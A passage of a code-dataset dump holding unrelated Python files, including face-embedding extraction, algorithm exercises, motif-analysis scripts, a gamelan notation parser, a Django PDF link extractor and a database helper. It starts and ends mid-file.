cv2.imread(image_path)\n return img\n\n\ndef get_feature(imgs, nets):\n count = len(imgs)\n data = mx.nd.zeros(shape=(count*2, 3, imgs[0].shape[0], imgs[0].shape[1]))\n for idx, img in enumerate(imgs):\n img = img[:, :, ::-1] # to rgb\n img = np.transpose(img, (2, 0, 1))\n for flipid in [0, 1]:\n _img = np.copy(img)\n if flipid == 1:\n _img = _img[:, :, ::-1]\n _img = nd.array(_img)\n data[count*flipid+idx] = _img\n\n F = []\n for net in nets:\n db = mx.io.DataBatch(data=(data,))\n net.model.forward(db, is_train=False)\n x = net.model.get_outputs()[0].asnumpy()\n embedding = x[0:count, :] + x[count:, :]\n embedding = sklearn.preprocessing.normalize(embedding)\n #print('emb', embedding.shape)\n F.append(embedding)\n F = np.concatenate(F, axis=1)\n F = sklearn.preprocessing.normalize(F)\n #print('F', F.shape)\n return F\n\n\ndef save_featu(path, feature):\n # ipdb.set_trace()\n np.save(path, feature)\n\n\ndef get_and_write(buffer, nets):\n imgs = []\n for k in buffer:\n imgs.append(k[0])\n features = get_feature(imgs, nets)\n # print(np.linalg.norm(feature))\n assert features.shape[0] == len(buffer)\n for ik, k in enumerate(buffer):\n out_path = k[1]\n feature = features[ik].flatten()\n save_featu(out_path, feature)\n\n\ndef load_faceid_model(model_path, gpuid=0, image_size='3,112,112'):\n ctx = mx.gpu(gpuid)\n nets = []\n image_shape = [int(x) for x in image_size.split(',')]\n for model in model_path.split('|'):\n vec = model.split(',')\n assert len(vec) > 1\n prefix = vec[0]\n epoch = int(vec[1])\n print('loading', prefix, epoch)\n net = edict()\n net.ctx = ctx\n net.sym, net.arg_params, net.aux_params = mx.model.load_checkpoint(\n prefix, epoch)\n all_layers = net.sym.get_internals()\n net.sym = all_layers['fc1_output']\n net.model = mx.mod.Module(\n symbol=net.sym, context=net.ctx, label_names=None)\n net.model.bind(\n data_shapes=[('data', (1, 3, image_shape[1], image_shape[2]))])\n net.model.set_params(net.arg_params, net.aux_params)\n nets.append(net)\n return nets\n\n\ndef main(args):\n print(args)\n nets = load_faceid_model(args.model, gpuid=args.gpu,\n image_size=args.image_size)\n\n i = 0\n succ = 0\n buffer = []\n for dirname, _, files in os.walk(args.image_dir):\n for fi in files:\n if not fi.endswith('.jpg'):\n continue\n if i % 1000 == 0:\n print(\"writing fs\", i, succ)\n i += 1\n image_path = os.path.join(dirname, fi)\n img = read_img(image_path)\n if img is None:\n print('read error:', image_path)\n continue\n out_path = image_path.replace('.jpg', '.npy')\n item = (img, out_path)\n buffer.append(item)\n if len(buffer) == args.batch_size:\n get_and_write(buffer, nets)\n buffer = []\n succ += 1\n if len(buffer) > 0:\n get_and_write(buffer, nets)\n buffer = []\n print('fs stat', i, succ)\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help='', default=32)\n parser.add_argument('--image_size', type=str, help='', default='3,112,112')\n parser.add_argument('--gpu', type=int, help='', default=0)\n parser.add_argument('--algo', type=str, help='', default='insightface')\n parser.add_argument('--image-dir', type=str, help='',\n default='./data/image_dir')\n parser.add_argument('--model', type=str, help='', default='')\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"Evaluation/LineUp/gen_features.py","file_name":"gen_features.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39229196","text":"def thirtyone():\n L = {}\n str = input()\n L[0] = str[0] # bottom-up base case\n for i in range(1, len(str)): # i represents the last pos of the sequence\n L[i] = '' # have to initialize\n for j in range(i): # j is where we take an LIS from a subproblem\n if ord(str[j]) <= ord(str[i]) and len(L[j]) + 1 > len(L[i]): # so it's incr and makes it longer\n L[i] = L[j]\n L[i] += str[i] # append the required final character\n print(L)\n max_key = max(L, key = lambda x: len(L[x]))\n print(L[max_key])\n\nthirtyone()\nexit()","sub_path":"0-Python Tasks/thirtyone_liang_d.py","file_name":"thirtyone_liang_d.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30558662","text":"import numpy as np\nimport sys\n\n\ndef integration_alg(func, lower_bound, upper_bound, number_of_steps):\n \"\"\"\n\n :param func: function to use in integration, when given a radius, will return the value at that point\n :param lower_bound: lower bound of integration\n :param upper_bound: upper bound of integration\n :param number_of_steps: number of steps to do\n :return:\n \"\"\"\n\n # Current method if the midpoint rule, as the function is an improper integral from the lower bound being 0\n\n # Need to integrate from lower_bound to upper_bound in number_of_steps\n\n # lower bound is 0, if there is a radius of 0, then no satallites in it\n integration_value = 0\n step_size = (upper_bound - lower_bound) / number_of_steps # The number of steps to take\n for i in range(number_of_steps):\n if i != 0:\n # Current step can be just i*step_size but only if integral always starts at 0\n # since it might not, need a starting point otherwise:\n current_step = lower_bound + i * step_size\n prev_step = lower_bound + (i - 1) * step_size\n\n # Current midpoint is the current step + the prev step divided by 2\n # F(mk) where mk = (tk + tk-1)/2\n current_midpoint = (current_step + prev_step) / 2\n integration_value += func(current_midpoint)\n\n # Last bit is the multiplication by the step size to get the full value\n integration_value *= step_size\n\n return integration_value\n\n\ndef part_four_a():\n Omega_M = 0.3\n Omega_Lambda = 0.7\n\n def integrand(a):\n \"\"\"\n Integrand for the LGF\n :param a:\n :return:\n \"\"\"\n return (1 / a ** 3) / (Omega_M / a ** 3 + Omega_Lambda) ** 1.5\n\n def a_from_z(z):\n \"\"\"\n Gets a from z\n :param z:\n :return:\n \"\"\"\n return 1 / (z + 1)\n\n a0 = 0\n final_a = a_from_z(50) # z = 50, a = (z+1)\n sys.stdout = open('4a.txt', 'w')\n integral = integration_alg(integrand, a0, final_a, 20000)\n print(\"Integral value for the Integrand: {}\".format(integral))\n\n lgf = 5 * Omega_M / 2 * np.sqrt(Omega_M / final_a ** 3 + Omega_Lambda) * integral\n print(\"LGF at z = 50: {}\".format(lgf))\n","sub_path":"four_a.py","file_name":"four_a.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"42304879","text":"class Solution:\n ## TLE 40mins\n def minmaxGasDist(self, stations, k):\n \"\"\"\n :type stations: List[int]\n :type k: int\n :rtype: float\n \"\"\"\n from heapq import heappop, heappush\n from math import ceil\n if not stations: return None\n if len(stations) < 2: return 0\n # stations.sort()\n q = []\n for i in range(1, len(stations)):\n dist = stations[i] - stations[i-1]\n heappush(q, (-dist, 0 , dist))\n if k == 0: return -heappop(q)\n if len(q) == 1: return -heappop(q) / (k+1)\n while k > 0:\n max_dist, count, origin = heappop(q)\n max_dist = -max_dist\n second_dist = -q[0][0]\n # (k,max_dist, second_dist, q).p()\n need_k = max(ceil(origin / second_dist) - 1 - count, 1) \n # need_k.p()\n if k >= need_k:\n k -= need_k\n heappush(q, (-(origin / (count+need_k+1)) , count+need_k, origin))\n else:\n return origin / (k+count+1)\n return -q[0][0]\n\n\n def minmaxGasDist(self, stations, k):\n \"\"\"\n :type stations: List[int]\n :type k: int\n :rtype: float\n \"\"\"\n import math\n left, right = 1e-6, stations[-1] - stations[0]\n while left + 1e-6 < right:\n mid = (left + right) / 2\n # count is the number of gas station we need to make it possible\n count = sum(math.ceil((stations[i] - stations[i-1]) / mid) - 1 \n for i in range(1, len(stations)))\n # it means mid is too small to realize using only K more stations\n if count > k:\n left = mid\n # it means mid is possible and we can continue to find a bigger one\n else:\n right = mid\n return right\n\nif __name__ == '__main__':\n from minitest import *\n\n with test(Solution):\n Solution().minmaxGasDist([1, 2, 3, 4, 5, 6, 7, 8, 9, 10],9).must_equal(0.5)\n Solution().minmaxGasDist([1,2,3,5,7],1).must_equal(2)\n Solution().minmaxGasDist([1,2,3,5,7],2).must_equal(1)\n Solution().minmaxGasDist([10,19,25,27,56,63,70,87,96,97],3).must_equal(9.666666666666666)\n Solution().minmaxGasDist([13,15,20,31,46,49,51,52,67,87],7).must_equal(6.666666666666667)\n\n","sub_path":"python/leetcode/search/774_Minimize_Max_Distance_to_Gas_Station.py","file_name":"774_Minimize_Max_Distance_to_Gas_Station.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430052494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 20 17:07:08 2019\n\n@author: libin\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom functools import reduce\n\ncellType = ['RG', 'IPC', 'eN', 'iN']\nhomer_extra = [\"Eomes\", \"Tbr1\", \"PAX6\", \"Brn2\", \"Brn1\", \"Sox2\"]\njaspar_extra = [\"EOMES\", \"TBR1\", \"Pax6\", \"DLX6\", \"POU3F2\", \"POU3F3\", \"Sox2\"]\n\n# EOMES : JASPAR,HOMER\n# TBR1: JASPAR, HOMER\n# PAX6: JASPAR, HOMER\n# DLX5: NA\n# DLX6: JASPAR\n# POU3F2: JASPAR; BRN2: HOMER\n# POU3F3: JASPAR; BRN1: HOMER\n# SOX2: HOMER, JASPAR\n\n\njaspar_df_lst = []\njaspar_cleaned_df_lst = []\njaspar_merged_df_lst = []\njaspar_motif_list = []\nfor ct in cellType:\n# ct = 'eN'\n jaspar = pd.read_csv(r'C:\\Users\\libin\\UCSF\\motif_analysis\\Aug 20\\jaspar_known_results\\knownResults_{}.txt'.format(ct), sep=\"\\t\")\n jaspar[\"CellType\"] = ct\n jaspar[\"Motif\"] = jaspar['Motif Name'].str.extract(r'(.+?)[\\/]', expand=True)\n # jaspar[\"Motif\"] = jaspar['Motif Name'].str.upper()\n jaspar = jaspar[[\"Motif\", \"P-value\"]]\n jaspar = jaspar.rename(columns={\"P-value\" : \"{}\".format(ct)})\n jaspar_df_lst.append(jaspar)\n jaspar_cleaned = jaspar.iloc[:15,:]\n jaspar_cleaned_df_lst.append(jaspar_cleaned)\n jaspar_motif_list = jaspar_motif_list + jaspar_cleaned['Motif'].tolist()\njaspar_motif_list = jaspar_motif_list + jaspar_extra\njaspar_motif_list_dedup = list(dict.fromkeys(jaspar_motif_list))\njaspar_motif_list_dedup = pd.DataFrame(jaspar_motif_list_dedup, columns=[\"Motif\"])\nfor jaspar_df in jaspar_df_lst:\n jaspar_merged = pd.merge(jaspar_motif_list_dedup, jaspar_df, on=[\"Motif\"], how=\"inner\")\n jaspar_merged_df_lst.append(jaspar_merged)\njaspar_merged_all = reduce(lambda x, y : pd.merge(x ,y, on=[\"Motif\"]), jaspar_merged_df_lst)\njaspar_merged_all.to_csv(r'C:\\Users\\libin\\R_projects\\motif_analysis\\jaspar_merged', index=False, header=True, sep=\"\\t\")\n \n\nhomer_df_lst = []\nhomer_cleaned_df_lst = []\nhomer_merged_df_lst = []\nhomer_motif_list = []\nfor ct in cellType:\n homer = pd.read_csv(r'C:\\Users\\libin\\UCSF\\motif_analysis\\Aug_21\\homer_known_results\\knownResults_{}.txt'.format(ct), sep=\"\\t\")\n homer[\"CellType\"] = ct\n # remove 'SeqBias' motifs\n homer = homer[~homer[\"Motif Name\"].str.contains(\"Bias\")]\n homer[\"Motif\"] = homer['Motif Name'].str.extract(r'(.+?)(?:\\/|$)', expand=True)\n # homer[\"Motif\"] = homer['Motif Name'].str.upper()\n homer[\"Motif_cleaned\"] = homer['Motif'].str.extract(r'(.+?)(?:\\(|$)', expand=True)\n homer = homer[[\"Motif_cleaned\", \"P-value\"]]\n homer = homer.rename(columns={\"P-value\" : \"{}\".format(ct), \"Motif_cleaned\" : \"Motif\"})\n homer_df_lst.append(homer)\n homer_cleaned = homer.iloc[:15,:]\n homer_cleaned_df_lst.append(homer_cleaned)\n homer_motif_list = homer_motif_list + homer_cleaned['Motif'].tolist()\nhomer_motif_list = homer_motif_list + homer_extra\nhomer_motif_list_dedup = list(dict.fromkeys(homer_motif_list))\nhomer_motif_list_dedup = pd.DataFrame(homer_motif_list_dedup, columns=[\"Motif\"])\nfor homer_df in homer_df_lst:\n homer_merged = pd.merge(homer_motif_list_dedup, homer_df, on=[\"Motif\"], how=\"inner\")\n homer_merged_df_lst.append(homer_merged)\nhomer_merged_all = reduce(lambda x, y : pd.merge(x ,y, on=[\"Motif\"]), homer_merged_df_lst)\nhomer_merged_all.to_csv(r'C:\\Users\\libin\\R_projects\\motif_analysis\\homer_merged', index=False, header=True, sep=\"\\t\")\n","sub_path":"plot_motif.py","file_name":"plot_motif.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"146212795","text":"import sqlite3\n\ncon = sqlite3.connect(\"test_data.db\")\ncur = con.cursor()\n\n\n\n#テーブルの挿入\nsql2 = \"insert into fruits values('test_post20.py', '/Users/kanekoshohei/Documents/Git/Python/samurai/test_post20.py')\"\ncur.execute(sql2)\ncon.commit()\n\n\ncon.close()\n","sub_path":"tmp/create_column.py","file_name":"create_column.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432848378","text":"from django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import get_object_or_404\nimport json\nfrom io import BytesIO\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\nfrom pdfminer.pdfinterp import PDFResourceManager\nfrom pdfminer.pdfinterp import PDFPageInterpreter\nfrom pdfminer.pdfpage import PDFPage\nfrom pdfminer.layout import LAParams\nfrom pdfminer.converter import PDFPageAggregator\nfrom pdfminer.layout import LTTextLineHorizontal, LTTextBoxVertical\nfrom pdfminer.layout import LTContainer\n\nimport models\n\n\nclass AddDocument(View):\n def __parse_pdf(self, layout, document):\n if isinstance(layout, LTTextLineHorizontal):\n text = layout.get_text()\n text = text.strip()\n if text.startswith(u\"http://\") or text.startswith(u\"https://\"):\n self.__save_url(text, document)\n elif isinstance(layout, LTContainer):\n for item in layout:\n self.__parse_pdf(item, document)\n\n def post(self, request, pdf_name):\n stream = BytesIO(request.body)\n parser = PDFParser(stream)\n laparams = LAParams()\n document = PDFDocument(parser)\n rsrcmgr = PDFResourceManager()\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n document_instance = models.PdfDocument(name=pdf_name, url_number=0)\n document_instance.save()\n for page in PDFPage.create_pages(document):\n interpreter.process_page(page)\n layout = device.get_result()\n layout.analyze(laparams)\n self.__parse_pdf(layout, document_instance)\n document_instance.save()\n return HttpResponse(200)\n\n def __save_url(self, text, document):\n document.url_number += 1\n url_object, created = models.Address.objects.get_or_create(path=text)\n if created:\n url_object.save()\n url_object.documents.add(document)\n url_object.save()\n\n\nclass GetDocumentsList(View):\n def get(self, request):\n documents = models.PdfDocument.objects.all()\n data = []\n for doc in documents:\n urls = doc.address_set.all()\n obj = {'id': doc.id, 'name': doc.name, 'url_count': len(urls)}\n data.append(obj)\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass GetDocURLs(View):\n def get(self, request, doc_id):\n document = get_object_or_404(models.PdfDocument, pk=doc_id)\n urls = document.address_set.all()\n items = [item.path for item in urls]\n return HttpResponse(json.dumps(items), content_type='application/json')\n\n\nclass ListUrls(View):\n def get(self, request):\n urls = models.Address.objects.all()\n data = []\n for item in urls:\n docs = item.documents.all()\n itemData = {'path': item.path, 'doc_count': len(docs)}\n data.append(itemData)\n return HttpResponse(json.dumps(data), content_type='application/json')","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"159973147","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 9 12:15:54 2018\n\n@author: jduran2\n\"\"\"\n\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport openpyxl as xl\nimport scipy\nfrom scipy.interpolate import interpn\nimport os\n\n \ndef putIntoArray(sheet, minRange, maxRange):\n cells = sheet[minRange:maxRange]\n cells = np.array(cells)\n cells = np.reshape(cells, cells.size)\n values = [cell.value for cell in cells]\n values = np.transpose(values)\n return values \n\nos.chdir(r'C:\\Users\\jduran2\\Dropbox (ORNL)\\UTK\\SCGSR\\LAMS Data\\Probe Maps') # pick the working directory\n\n\nfile_name = \"AD32_Map.xlsx\"\ndata_min = 2\ndata_max = 3435\n\nwb = xl.load_workbook(file_name, data_only=True) #change this to a user input string for which file to analyze\nworksheets = wb.get_sheet_names()\nsheet = wb.get_sheet_by_name(worksheets[1])\ndata = putIntoArray(sheet, \"C\"+ str(data_min), \"C\" + str(data_max))\nrmm = putIntoArray(sheet, \"A\"+ str(data_min), \"A\" + str(data_max))\nPmm = putIntoArray(sheet, \"B\"+ str(data_min), \"B\" + str(data_max))\n\n\nz=data\nx=rmm\ny=Pmm\nz_array=[]\n\n#z2 = scipy.interpolate.interp2d(x, y, z, kind='linear')\n\n#Use this for 2D contour plots\n\"\"\"\nfrom scipy.interpolate import griddata\n\nX,Y = np.meshgrid(x,y)\nZ = griddata((x,y),z,(x[None,:],y[:,None]), method='nearest', rescale='false')\n#Z = interpn((x,y),z,(x[None,:],y[:,None]))\nCP = plt.contourf(X,Y,Z,100,cmap=cm.jet)\nplt.scatter(x, y, marker='o', s=5, zorder=10)\n\nfsize=19\nplt.title('CP Contour Plot', size=fsize)\nplt.xlabel('r [mm]', size=fsize)\nplt.ylabel('z [mm]', size=fsize)\ncbar = plt.colorbar(CP)\ncbar.ax.set_ylabel('Total W counts via LAMS', size=fsize)\nplt.rcParams.update({'font.size': fsize})\n\"\"\"\n#Use this for 2Dcolormaps of Raw Data\n\nimport pandas as pd\nimport seaborn as sns\n\ndf = pd.DataFrame.from_dict(np.array([x,y,z]).T)\ndf.columns = ['Poloidal Location [mm]','Axial Location [mm]','Z_value']\ndf['Z_value'] = pd.to_numeric(df['Z_value'])\npivotted= df.pivot('Axial Location [mm]','Poloidal Location [mm]','Z_value')\nax=sns.heatmap(pivotted,cmap=cm.jet,cbar_kws={'label': 'Total W Intensity'}) #vmax=###### for cbar limit 'Total W Intensity'\nax.invert_yaxis()\nfor ind, label in enumerate(ax.get_xticklabels()):\n if ind % 20 == 0: # every 10th label is kept\n label.set_visible(True)\n else:\n label.set_visible(False)\n#ax.figure.savefig(\"output.png\")\n\n#Use this for 3Dcolormaps\n\"\"\"\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_trisurf(x, y, z, cmap=cm.jet, linewidth=0.2)\n#ax.zaxis.set_scale('log')\n\nfor angle in range(0, 360):\n ax.view_init(90, angle)\n plt.draw()\n plt.pause(.001)\n\nplt.show()\n\"\"\"\n\n","sub_path":"misc/lams/cpMap_axial.py","file_name":"cpMap_axial.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525968661","text":"# ---------------------------------------------------------------\n# Problem H | ICPC North America Qualifiers 2015 | Eshan Uniyal\n# December 2018, Python 3\n# http://cs.baylor.edu/~hamerly/icpc/qualifier_2015/\n# problemset-naq-2015.pdf?fbclid=IwAR1Y75gFxxxJr-wKxg8y-QAhr_57GfEBwRokbFclSsCcR28CoZlTn5GmPyE\n# ---------------------------------------------------------------\n\nimport timer\n\n# Sample Input\n# 3\n# iloveyouJack\n# iloveyoutooJill\n# TheContestisOver\n\ndef convert(message):\n \"\"\"function to create matrix from message\"\"\"\n # takes 0.00017 seconds for three lines; even with the significantly large upper-limit for message length (10,000),\n # since maximum number of lines is 100, should run well below 2 seconds\n\n # determining size (length or breadth) of the matrix\n size = int(len(message) ** 0.5)\n\n if size ** 2 < len(message):\n size += 1\n\n string = message + '*' * (size ** 2 - len(message))\n\n # creating matrix\n matrix = []\n\n for i in range(0, size):\n matrix.append([x for x in string[i * size: (i + 1) * size]])\n\n # creating inverse of matrix\n\n inverted_matrix = []\n for i in range(0, size):\n inverted_matrix.append([row[i] for row in matrix][:: -1])\n\n return inverted_matrix\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n # taking input\n num_lines = int(input()) # to determine number of lines\n lines = [] # to store lines\n\n for i in range(0, num_lines):\n lines.append(input())\n\n timer.start()\n\n # computing and printing output\n for line in lines:\n\n result_matrix = convert(line)\n\n # removing asterisks\n for row in result_matrix:\n for character in row:\n if character == '*':\n row.remove(character)\n\n # joining characters\n result = ''\n for row in result_matrix:\n result += ''.join(row)\n\n print(result)\n\n\nmain()\ntimer.end()\n\n# Expected Sample Output:\n# Jeiaylcookuv\n# iteiloylloooJuv\n# OsoTvtnheiterseC","sub_path":"ICPC_North_America_Qualifiers_2015/problem_H.py","file_name":"problem_H.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619742322","text":"# ybc module\n\nimport string\nimport os\nimport re\nimport sys\n\npitchCodesIn = ['1','2','3','4','5','6','7','q','w','e','r','t','y','u','!','@','#','\\$','%','\\^','&',]\npitchCodesOut = [' b1 ',' b2 ',' b3 ',' b4 ',' b5 ',' b6 ',' b7 ',' a1 ',' a2 ',' a3 ',' a4 ',' a5 ',' a6 ',' 7a ',' c1 ',' c2 ',' c3 ',' c4 ',' c5 ',' c6 ',' c7 ']\n\nybcCorpus = list() # list of ybcBalungan instances\n\nclass ybcBalungan:\n def __init__(self, filename):\n self.filename = filename\n self.shortname = re.sub('/.*/(.*).txt','\\g<1>',filename)\n self.gatras = list() # list of ybcGatra instances\n self.scale = ''\n self.mode = ''\n\nclass ybcGatra:\n def __init__(self):\n self.notes = list() # list of ybcNote instances\n \nclass ybcNote: # class for balungan notes\n def __init__(self, pitch, beat):\n \n # pitch and beat must be identified\n self.pitch = pitch\n self.beat = beat\n \n # set defaults for other variables\n self.gong = False\n self.nong = False\n self.pul = False\n self.beatOffset = 0\n \n def __str__(self):\n return 'pitch = {0}, beat = {1}, gong = {2}, nong = {3}, pul = {4}'.format(self.pitch, self.beat, self.gong, self.nong, self.pul)\n\nclass ybcCorpus:\n def __init__(self, ybcPathname):\n\n self.balungans = list()\n \n corpusDirs = [\n 'slendro/manyura/ladrang/',\n 'slendro/nem/ladrang/',\n 'slendro/sanga/ladrang/'\n ]\n\n corpusFiles = []\n for theDir in corpusDirs:\n thePath = ybcPathname + '/corpus/' + theDir + 'txt/'\n corpusFiles.extend( [ thePath + f for f in os.listdir(thePath) ] )\n \n\n for theFile in corpusFiles:\n\n if theFile[-16:] == 'Sala Minulya.txt': continue # this file has a problem\n\n thisBalungan = ybcBalungan(theFile)\n f = open(theFile, 'r')\n for l in f:\n l = l.strip()\n \n if len(l) == 0: continue\n tag = re.search('<(.*)>', l)\n # print l\n if tag: # m is True if the current line consists of a \n metadata = string.rsplit(tag.groups(1)[0],' ') # TK: use this metadata\n if metadata[0] == 'P':\n thisBalungan.mode = metadata[1]\n if metadata[0] == 'L':\n thisBalungan.scale = metadata[1]\n else: # we've got plain data\n\n # do some basic cleanup\n l = re.sub('\\\\t\\\\t','\\\\t',l) # get rid of double tabs, assuming they're meaningless\n l = re.sub('\\\\t\\\\t','\\\\t',l) # do it again in case there were any triple tabs\n l = re.sub('\\\\[','',l) # get rid of brackets until we know what to do with them\n l = re.sub('\\\\]','',l)\n l = re.sub('o ','',l) # get rid of 'o' which represents a segno-type star in Kepatihan\n l = re.sub('o','',l) # get rid of 'o' which represents a segno-type star in Kepatihan\n l = re.sub('\\\\\\\\','',l) # get rid of '\\' which represents a segno-type star in Kepatihan\n\n\n gatras = l.split('\\t') # split the current line on tab characters (which separate gatras)\n \n for g in gatras:\n\n # beats within gatra are separated by spaces -- split on spaces and clean up\n gs = string.rstrip(g).split(' ')\n i = 0\n while i < len(gs): \n \n # three successive spaces in the input file is interpreted as a single blank beat\n # split will have parsed three successive spaces into two successive null strings\n if i+1 < len(gs) and gs[i] == '' and gs[i+1] == '': \n gs.pop(i+1) # delete the second null string\n \n else:\n i += 1\n\n # die if there are more than four beats in the gatra\n if len(gs) > 4: \n sys.exit('gatra with more than four beats in ' + theFile + ': ' + str(gs) + '>'+l)\n \n # if we have fewer than four beats, assume they are at the end of the gatra\n if len(gs) < 4:\n for j in range(4-len(gs)):\n gs[:0] = [' '] # insert a space before the first item in gs\n \n # now we're ready to create a ybcGatra instance for this gatra\n thisGatra = ybcGatra()\n \n # parse pitch characters, adding spaces before and after\n old = str(gs)\n for beat in range(len(gs)):\n\n\n noteCount = 0\n # we use two matching lists (pitchCodesIn and -Out) so we can go through in\n # the right order; digits need to get translated first because we use them\n # in the output as well as the input\n for j in range(len(pitchCodesIn)):\n (newtext, subs) = re.subn(pitchCodesIn[j], pitchCodesOut[j], gs[beat])\n gs[beat] = newtext\n noteCount += subs\n \n # print noteCount, gs[i], gs, old\n # get rid of any extra spaces we just made\n gs[beat] = re.sub('^ ','',gs[beat]) # eliminate leading spaces\n gs[beat] = re.sub(' $','',gs[beat]) # eliminate trailing spaces\n gs[beat] = re.sub(' ',' ',gs[beat]) # consolidate double spaces\n \n beatContents = string.rsplit(gs[beat], ' ')\n \n # trivial case: a rest only\n if noteCount == 0:\n theNote = ybcNote('',beat)\n \n # simplest non-trivial case: one note in the beat\n elif noteCount == 1:\n if len(beatContents) == 1:\n thisNote = ybcNote(beatContents[0], beat)\n elif len(beatContents) == 2:\n # the first item in beatContents is a gong marker\n thisNote = ybcNote(beatContents[1], beat)\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if re.search('g',beatContents[0]): \n thisNote.gong = True\n else:\n sys.exit('syntax error in '+filename+': '+l)\n thisGatra.notes.append(thisNote)\n \n # with two notes in the beat we assume they're equal\n elif noteCount == 2:\n thisNote = ybcNote('',beat)\n while beatContents != []:\n if beatContents[0][0] not in string.digits:\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if re.search('g',beatContents[0]): \n thisNote.gong = True\n beatContents.pop(0)\n continue\n else:\n thisNote.pitch = beatContents[0]\n thisGatra.notes.append(thisNote)\n if len(beatContents) > 1: \n thisNote = ybcNote('',beat + 0.5)\n beatContents.pop(0)\n continue\n \n # with more than two notes we only look at the first note \n else: \n sys.stderr.write('WARNING: Ignoring all but first note in a beat with more than 2 subdivisions.\\n')\n sys.stderr.write('File: '+thisBalungan.filename+'\\n')\n thisNote = ybcNote('',beat)\n if beatContents[0][0] not in string.digits:\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if re.search('g',beatContents[0]): \n thisNote.gong = True\n else:\n thisNote.pitch = beatContents[0]\n thisGatra.notes.append(thisNote)\n \n\n # now add theGatra to theBalungan\n thisBalungan.gatras.append(thisGatra)\n \n # add thisBalungan to the corpus\n self.balungans.append(thisBalungan)","sub_path":"code/ybc.py","file_name":"ybc.py","file_ext":"py","file_size_in_byte":10118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"22993019","text":"import sqlite3 as sq# sqlite\nimport pymssql as ms # mssql\nimport pymysql as my # mysql\n\n# 处理pyinstaller 和 pymssql 闪退问题\n\nimport uuid\nimport _mssql\nimport decimal\nimport pypyodbc\ndecimal.__version__\nuuid.ctypes.__version__\n_mssql.__version__\n\nclass db:\n\tdef __init__(self,type='',file='',host='',username='',password='',database=''):\n\t\tdbType = ['sqlite','mssql','mysql']\n\t\t# 判断系统类型\n\t\tif not type in dbType:\n\t\t\traise RuntimeError('数据库类型错误,类型必须为:'+','.join(dbType))\n\t\t\treturn \n\t\tself.type = type\n\t\tif type == 'sqlite':\n\t\t\tself.conn = sq.connect(file)\n\t\telif type == 'mssql':\n\t\t\tself.conn = ms.connect(host=host,user=username,password=password,database=database,charset='utf8')\n\t\telif type == 'mysql':\n\t\t\tself.conn = my.connect(host=host,user=username,password=password,database=database,charset='utf8')\n\t\tself.cur = self.conn.cursor()\n\t\t\n\tdef __execute(self,sql):\n\t\ttry:\n\t\t\tself.cur.execute(sql)\n\t\t\tself.conn.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.conn.rollback()\n\t\t\tprint(e)\n\t\t\treturn False\n\tdef select(self,sql):\n\t\ttry:\n\t\t\tself.cur.execute(sql)\n\t\t\ttitles = [name[0] for name in self.cur.description]\n\t\t\tdata = [titles]\n\t\t\tfor line in self.cur.fetchall():\n\t\t\t\tlineData = []\n\t\t\t\tfor value in line:\n\t\t\t\t\tlineData.append(value)\n\t\t\t\tdata.append(lineData)\n\t\t\treturn data\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\tdef sql(self,sql):\n\t\treturn self.__execute(sql)\n\tdef insertMany(self,sql,data):\n\t\tif self.type =='sqlite':\n\t\t\tsql = sql.replace('%s','?')\n\t\ttry:\n\t\t\tself.cur.executemany(sql,data)\n\t\t\tself.conn.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.conn.rollback()\n\t\t\tprint(e)\n\t\t\treturn False\n\tdef close(self):\n\t\tself.cur.close()\n\t\tself.conn.close()\n","sub_path":"tool/dbHelper.py","file_name":"dbHelper.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370016959","text":"\"\"\"Barchart Model\"\"\"\n__docformat__ = \"numpy\"\n\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_options_info(ticker: str) -> 